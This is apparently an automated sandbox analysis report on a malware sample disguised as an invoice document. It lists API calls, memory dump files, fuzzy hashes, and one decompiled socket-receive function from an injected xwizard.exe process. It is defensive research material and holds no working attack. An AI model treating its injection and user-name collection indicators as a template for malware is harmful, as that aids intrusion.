Instruction Fuzzy Hash: 7EE0ECB1A04711CFD360DF799804BA377E8FB08A413044B6EE5CAD3610F734D9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BD631E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32 ref: 00BD6337
GetLastError.KERNEL32(?), ref: 00BD6342

Part of subcall function 00BD601D: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BD6030
Part of subcall function 00BD601D: GetProcAddress.KERNEL32(00000000,MoveFileTransactedA), ref: 00BD6040

Strings

@Mxt, xrefs: 00BD6342

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleMoveProc
String ID: @Mxt
API String ID: 1698652658-1922883433
Opcode ID: 5053235bb11869108dd6ba97876a529245033444a4cf4d1cdf01ae62d9d137dc
Instruction ID: 1e8fefe10c0f5432e1e788e547282e24115ee2c4ba8219750dc02fd7e550865b
Opcode Fuzzy Hash: 5053235bb11869108dd6ba97876a529245033444a4cf4d1cdf01ae62d9d137dc
Instruction Fuzzy Hash: 8BE01232501319E78B046FE99C44DEEB7DDAE08761704409ABA05D3300E630E9119BB6

Uniqueness

Uniqueness Score: -1.00%

Function 00BD62EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?), ref: 00BD6302
GetLastError.KERNEL32(?), ref: 00BD630D

Part of subcall function 00BD5D7B: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BD5D8C
Part of subcall function 00BD5D7B: GetProcAddress.KERNEL32(00000000,DeleteFileTransactedA), ref: 00BD5D9C

Strings

@Mxt, xrefs: 00BD630D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressDeleteErrorFileHandleLastModuleProc
String ID: @Mxt
API String ID: 2490887775-1922883433
Opcode ID: 99cb7cf8da499ff70ed63f77d015ee134d4fd2210f5421fcb9ec04a13fd4d425
Instruction ID: b08d1f2aa68917294b0668e369c84178de9a11e499a4d37a28c2f95001da9c62
Opcode Fuzzy Hash: 99cb7cf8da499ff70ed63f77d015ee134d4fd2210f5421fcb9ec04a13fd4d425
Instruction Fuzzy Hash: 4DD01236501314D78B046FA998098DAB7DCAE1576170040AAB905D3301E624990587B6

Uniqueness

Uniqueness Score: -1.00%

Function 00BD6494, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

UnlockFile.KERNEL32(?,?,?,?,?), ref: 00BD64A9
GetLastError.KERNEL32 ref: 00BD64B6

Strings

@Mxt, xrefs: 00BD64B6

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorFileLastUnlock
String ID: @Mxt
API String ID: 3655728120-1922883433
Opcode ID: 2ba3a4b1422a173e56d13dae732c5085164a4e2e93a7f0c57948731079cd80e2
Instruction ID: 9e06b2341ba513d9c28a41f84aa8e35c9abb1840fdd7bfa4a0857a26399604fe
Opcode Fuzzy Hash: 2ba3a4b1422a173e56d13dae732c5085164a4e2e93a7f0c57948731079cd80e2
Instruction Fuzzy Hash: 31E0B636500218EBCF125FA1EC09D9B7FA9EF082617048555FA1997220D772E820ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B911A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(00E3E810,00000000,00000000), ref: 00B911A9
GetLastError.KERNEL32 ref: 00B911B3

Strings

@Mxt, xrefs: 00B911B3

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mxt
API String ID: 3413597225-1922883433
Opcode ID: 7fdc5a619de267fc455391002c7f2c65a38d76001175760c7ca0b8c860ec66c9
Instruction ID: 101cf1420907af582f43366369af75f338756ee2a1e23dd3bbaabd13092ce3a6
Opcode Fuzzy Hash: 7fdc5a619de267fc455391002c7f2c65a38d76001175760c7ca0b8c860ec66c9
Instruction Fuzzy Hash: 34E01234340362F9EB245F67AD0D7A52AD8A70174AF2488A8E905FA3E1E7A4D0049736

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2460, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BC209E,?,?,?,00B91384), ref: 00BC2465
GetLastError.KERNEL32(?,00BC209E,?,?,?,00B91384), ref: 00BC246F

Strings

@Mxt, xrefs: 00BC246F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: @Mxt
API String ID: 439134102-1922883433
Opcode ID: cb27d1c8e5eaa0ba6db8ba42e2aec73c3b13074f9932f82bc99e5fc911c990f1
Instruction ID: 284760749f568833c7ed1f58f174989c5708751362e25ce20077e3252e144e7b
Opcode Fuzzy Hash: cb27d1c8e5eaa0ba6db8ba42e2aec73c3b13074f9932f82bc99e5fc911c990f1
Instruction Fuzzy Hash: A8D0C937A112328786381BA92C08B975B94AB05AA27060358BD44E7301D515CC0082F1

Uniqueness

Uniqueness Score: -1.00%

Function 00C0617F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00E48480), ref: 00C06185
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00E48480), ref: 00C0618F

Strings

@Mxt, xrefs: 00C0618F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: @Mxt
API String ID: 439134102-1922883433
Opcode ID: a77d3b0d1ffd46944fd408d6d49e5cf6ba84a3b75584b7e04cf3fca049d44ff3
Instruction ID: c3d0a0b1395f0aea1e95cd000d5846321aa3e8c08b3dc3cb4882ed2e05467847
Opcode Fuzzy Hash: a77d3b0d1ffd46944fd408d6d49e5cf6ba84a3b75584b7e04cf3fca049d44ff3
Instruction Fuzzy Hash: CAD01275310301C6EF109F718D087EA33DC7B44A42F9805587018C6191EB29C500D731

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4515, Relevance: 5.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000001), ref: 00BC45A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000001), ref: 00BC45B9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000001), ref: 00BC45CD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000001), ref: 00BC45E1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 59e2746c5cca3a977035d11b9e5f562083bef2cda7c592ff710632270a0cacc2
Instruction ID: 7054e40f0d58bcc92a98b585e167ea4cd6ae2cb2e287f9ee45a1f6418b984366
Opcode Fuzzy Hash: 59e2746c5cca3a977035d11b9e5f562083bef2cda7c592ff710632270a0cacc2
Instruction Fuzzy Hash: CF21C4B2240210BBE614ABA1DC96FBB379CEF68701F000119FE06DB681EB60E704C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2977, Relevance: 5.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00E47F04,00E47EE8,?,00E47F04), ref: 00BC29F4
LeaveCriticalSection.KERNEL32(00E47F04,?), ref: 00BC2A07
LocalFree.KERNEL32(00000000), ref: 00BC2A10
TlsSetValue.KERNEL32(?,00000000), ref: 00BC2A2F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 86478344a5a569ec5d854fcd1afdc3ab5047aee9147aafece54ea10821d44361
Instruction ID: df02de56580c9787b2b85e5b274a035c3e15d5cfec6b8ec04486203cdcdabc99
Opcode Fuzzy Hash: 86478344a5a569ec5d854fcd1afdc3ab5047aee9147aafece54ea10821d44361
Instruction Fuzzy Hash: 75210735A00209EFCB14DF58C894E9DBBB5FF49311F1481A9E946DB361CB71E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6590, Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00E48118,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65C1
InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65D7
LeaveCriticalSection.KERNEL32(00E48118,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65E5
EnterCriticalSection.KERNEL32(00000000,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65F2

Part of subcall function 00BC6527: InitializeCriticalSection.KERNEL32(00E48118,00BC65AB,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC653F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: 92e97a673cf657fc30e99cd4aceccee756c8430e1752ebb6c2c436f9d930920a
Instruction ID: 3c6db22a5855fce9408e44648b7b3ae1dace43b5ae795f6bf4065d1d91bd81e2
Opcode Fuzzy Hash: 92e97a673cf657fc30e99cd4aceccee756c8430e1752ebb6c2c436f9d930920a
Instruction Fuzzy Hash: 47F0AF72A0021CEFDB002B94AC49F6D77ACEB62755F541166F401E2222CB34CC068AA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2C2B, Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00E47F04,?,?,?,?,00BC2C0E,00000000,00000004,00BB2293,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC2C37
TlsGetValue.KERNEL32(00E47EE8,?,?,?,?,00BC2C0E,00000000,00000004,00BB2293,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC2C4B
LeaveCriticalSection.KERNEL32(00E47F04,?,?,?,?,00BC2C0E,00000000,00000004,00BB2293,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC2C65
LeaveCriticalSection.KERNEL32(00E47F04,?,?,?,?,00BC2C0E,00000000,00000004,00BB2293,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC2C70

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: b05f19bd65acf47f507d89981e0c537b1d0fc225f87fc59c2f2bfb5fee68dd9f
Instruction ID: 03db09580d88e82f241b9b796e96a1321c41afa8b842af1becb87f0a3e23d215
Opcode Fuzzy Hash: b05f19bd65acf47f507d89981e0c537b1d0fc225f87fc59c2f2bfb5fee68dd9f
Instruction Fuzzy Hash: D6F05436610214DFCB105F65DDC8E9FBBECEE14B613054699E807D7215CB31FC159AA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: xwizard.exe PID: 5612 Parent PID: 6968 xwizard.exeCOMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.8%
Total number of Nodes:	485
Total number of Limit Nodes:	41

Executed Functions

Function 00CC161A, Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNELBASE(00000040,00010007,?,0000006C,0000002E), ref: 00CC1645
GetSystemInfo.KERNELBASE(?,?,?,00000064,?,0000006C,0000002E), ref: 00CC1673
LocalFree.KERNELBASE(00000000,?,?,00000064,?,0000006C,0000002E), ref: 00CC16F9

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: Local$AllocFreeInfoSystem
String ID:
API String ID: 3916448017-0
Opcode ID: 657872f51bbaebb2accd056cca8429ba098a0819191ba33d3b674b09dfc63153
Instruction ID: f7d199a747e6c5277fecb2fbea8d3a08929a76bbfb778f64d8cab05dffcb1231
Opcode Fuzzy Hash: 657872f51bbaebb2accd056cca8429ba098a0819191ba33d3b674b09dfc63153
Instruction Fuzzy Hash: 6721F431B40308A7DF25A6E6CC07FEE77659F82360F2C012CFA21B71C2DA60A941D761

Uniqueness

Uniqueness Score: -1.00%

Function 004130E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00413112
WideCharToMultiByte.KERNEL32 ref: 00413154

Strings

@, xrefs: 0041312D

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharMultiNameUserWide
String ID: @
API String ID: 2949824840-2766056989
Opcode ID: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
Instruction ID: 75a62b7ad59212d7e7d3757252a2119b8f15ada3fb68da9ed8f134ad780259a0
Opcode Fuzzy Hash: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
Instruction Fuzzy Hash: 830108B0409341AED320AF26D94479BFBE4BBD4714F008A1EE49847290D37985498B97

Uniqueness

Uniqueness Score: -1.00%

Function 00405FBE, Relevance: 3.0, APIs: 2, Instructions: 31
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00405FBE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t11;
				intOrPtr* _t18;
				intOrPtr* _t19;

				_v16 = 0;
				_v20 = _a12;
				_v24 = _a8;
				_t11 = _a4;
				 *_t18 = _t11; // executed
				L0041F90C(); // executed
				_t19 = _t18 - 0x10;
				if(_t11 == 0xffffffff) {
					L0041F964();
					_t17 = 0;
					if(_t11 != 0x2733) {
						 *_t19 =  &_v12;
						E00405999(0);
						_t17 = 0xffffffff;
					}
				} else {
					_t17 = _t11;
					if(_t11 == 0) {
						 *_t19 =  &_v12;
						E00405999(_t17);
						_t17 = 0;
					}
				}
				return _t17;
			}

0x00405fc5
0x00405fcd
0x00405fd5
0x00405fd9
0x00405fdd
0x00405fe0
0x00405fe5
0x00405feb
0x00406003
0x00406008
0x0040600f
0x00406015
0x00406018
0x0040601d
0x0040601d
0x00405fed
0x00405fef
0x00405ff1
0x00405ff7
0x00405ffa
0x00405fff
0x00405fff
0x00405ff1
0x00406025

APIs

recv.WS2_32 ref: 00405FE0
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00406074), ref: 00406003

Part of subcall function 00405999: shutdown.WS2_32 ref: 004059B6
Part of subcall function 00405999: closesocket.WS2_32(00000000), ref: 004059C2

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocketrecvshutdown
String ID:
API String ID: 1486353823-0
Opcode ID: cef1c203a13e6339b71b227b83384d952d40f96f061476ba986419ca8909447b
Instruction ID: 50f9dbed06e6853259d32925d3d8c4084038ba02febeb7ff5867e9cbce9530da
Opcode Fuzzy Hash: cef1c203a13e6339b71b227b83384d952d40f96f061476ba986419ca8909447b
Instruction Fuzzy Hash: 1DF0F9B49087458BD300FF3DC44521ABAE1BF88328F558A3EE499E3395E63CC5558E07

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1B78, Relevance: 91.7, APIs: 1, Strings: 60, Instructions: 212
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000089,00003000,00000040,00000000,00000004,00000000), ref: 00CC1E42

Strings

g, xrefs: 00CC1D8E
j, xrefs: 00CC1BFF
H, xrefs: 00CC1DAE
M, xrefs: 00CC1DA6
g, xrefs: 00CC1D9A
(, xrefs: 00CC1CA1
H, xrefs: 00CC1CF2
}, xrefs: 00CC1CEA
g, xrefs: 00CC1D7E
, xrefs: 00CC1DBE
H, xrefs: 00CC1D46
H, xrefs: 00CC1C6D
H, xrefs: 00CC1CA9
$, xrefs: 00CC1DFB
$, xrefs: 00CC1C3A
M, xrefs: 00CC1C9D
L, xrefs: 00CC1C81
_, xrefs: 00CC1DC2
g, xrefs: 00CC1CDD
], xrefs: 00CC1E23
M, xrefs: 00CC1C61
g, xrefs: 00CC1D5E
#, xrefs: 00CC1DE6
, xrefs: 00CC1D7A
@, xrefs: 00CC1D6A
3, xrefs: 00CC1C06
}, xrefs: 00CC1D66
H, xrefs: 00CC1D36
U, xrefs: 00CC1BD5
H, xrefs: 00CC1D06
L, xrefs: 00CC1C95
f, xrefs: 00CC1E07
|, xrefs: 00CC1D0E
d, xrefs: 00CC1DB6
g, xrefs: 00CC1C7D
H, xrefs: 00CC1D6E
H, xrefs: 00CC1CC9
, xrefs: 00CC1C8D
$, xrefs: 00CC1DDE
H, xrefs: 00CC1D1A
H, xrefs: 00CC1D9E
H, xrefs: 00CC1C56
u, xrefs: 00CC1CC1
0, xrefs: 00CC1CB5
8, xrefs: 00CC1CEE
D, xrefs: 00CC1DDA
U, xrefs: 00CC1C75
t, xrefs: 00CC1D26
g, xrefs: 00CC1C91
g, xrefs: 00CC1C4F
g, xrefs: 00CC1CA5
H, xrefs: 00CC1CE1
t, xrefs: 00CC1CFE
g, xrefs: 00CC1C69
E, xrefs: 00CC1CB1
0, xrefs: 00CC1DAA
U, xrefs: 00CC1D86
E, xrefs: 00CC1C89
W, xrefs: 00CC1CD9
7, xrefs: 00CC1D32

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: $ $ $#$$$$$$$($0$0$3$7$8$@$D$E$E$H$H$H$H$H$H$H$H$H$H$H$H$H$L$L$M$M$M$U$U$U$W$]$_$d$f$g$g$g$g$g$g$g$g$g$g$j$t$t$u$|$}$}
API String ID: 4275171209-2925712947
Opcode ID: fc7789f14c41032a0f6f014d64f609681c8a40c3c6608ec152d403a356190e84
Instruction ID: 2302b3900cae5849df1f641d8aad758236a5126ff90e42290fdf3e76325f6e32
Opcode Fuzzy Hash: fc7789f14c41032a0f6f014d64f609681c8a40c3c6608ec152d403a356190e84
Instruction Fuzzy Hash: 27C19C509087D9D9DB22C6BC88487CDBFB11F27228F4842C9E1E87B2D2C7B90559D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC21FB, Relevance: 91.7, APIs: 1, Strings: 60, Instructions: 211
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000089,00003000,00000040,00000000,?,00000000), ref: 00CC24C4

Strings

H, xrefs: 00CC232B
g, xrefs: 00CC22EB
}, xrefs: 00CC23ED
0, xrefs: 00CC2337
t, xrefs: 00CC23AD
d, xrefs: 00CC243D
}, xrefs: 00CC236B
D, xrefs: 00CC2461
_, xrefs: 00CC2449
E, xrefs: 00CC230B
8, xrefs: 00CC2370
H, xrefs: 00CC234B
H, xrefs: 00CC2435
#, xrefs: 00CC246D
g, xrefs: 00CC2327
j, xrefs: 00CC2281
@, xrefs: 00CC23F1
U, xrefs: 00CC240D
u, xrefs: 00CC2343
$, xrefs: 00CC2482
, xrefs: 00CC230F
W, xrefs: 00CC235B
g, xrefs: 00CC23E5
f, xrefs: 00CC248E
H, xrefs: 00CC23BD
H, xrefs: 00CC23A1
g, xrefs: 00CC2405
H, xrefs: 00CC2374
$, xrefs: 00CC22BC
U, xrefs: 00CC22F7
t, xrefs: 00CC2385
L, xrefs: 00CC2303
H, xrefs: 00CC23F5
$, xrefs: 00CC2465
0, xrefs: 00CC2431
H, xrefs: 00CC22D8
H, xrefs: 00CC23CD
g, xrefs: 00CC2415
M, xrefs: 00CC242D
L, xrefs: 00CC2317
H, xrefs: 00CC2425
